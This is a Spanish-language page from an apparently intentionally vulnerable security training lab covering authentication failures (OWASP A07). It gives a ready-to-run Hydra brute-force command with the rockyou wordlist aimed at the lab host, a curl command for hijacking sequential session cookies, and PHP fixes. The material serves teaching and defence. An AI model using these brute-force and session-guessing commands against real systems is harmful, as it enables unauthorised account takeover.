🔐 Iniciar Sesión

Accede a tu cuenta de Nexo

← Volver al inicio

💡 Pistas del lab

Brute force: No hay límite de intentos. Probá con Hydra o manualmente.

Usuarios conocidos:

alice — password de A04
bob — password de A04
admin — password de A02

A07:2025 Intermedia

🔴 VULNERABLE

Authentication Failures

Este login tiene dos problemas:

Sin rate limiting: Podés hacer brute force sin límite de intentos
Session ID predecible: Después de login, el session_id es un entero secuencial

# 1. Brute force con Hydra contra la VPS:
# Usamos -t 1 para evitar falsos positivos por concurrencia/rate limit.
# Usamos Set-Cookie porque el login exitoso emite NEXO_SESS.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 1 -f \
  nexolab.guajilodev.com https-post-form \
  "/a07_login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie\: NEXO_SESS="

# 2. Session hijacking:
# Después de login, tu cookie es NEXO_SESS=1006
# Probá NEXO_SESS=1001, 1002, 1003...
curl -i --cookie "NEXO_SESS=1001" \
  https://nexolab.guajilodev.com/a07_login/dashboard.php

Herramientas: Hydra Burp Suite Intruder curl

// 1. Rate limiting:
if (getFailedAttempts($ip) > 5) {
    sleep(30); // o bloquear temporalmente
}

// 2. Session ID seguro:
session_regenerate_id(true);
// PHP genera ID random de 128+ bits

Rockstar Games (2022)

Credential stuffing masivo sin rate limiting. Miles de cuentas comprometidas antes de detectarlo.

CWEs: CWE-307 CWE-384 CWE-521

🛡️ Ver versión segura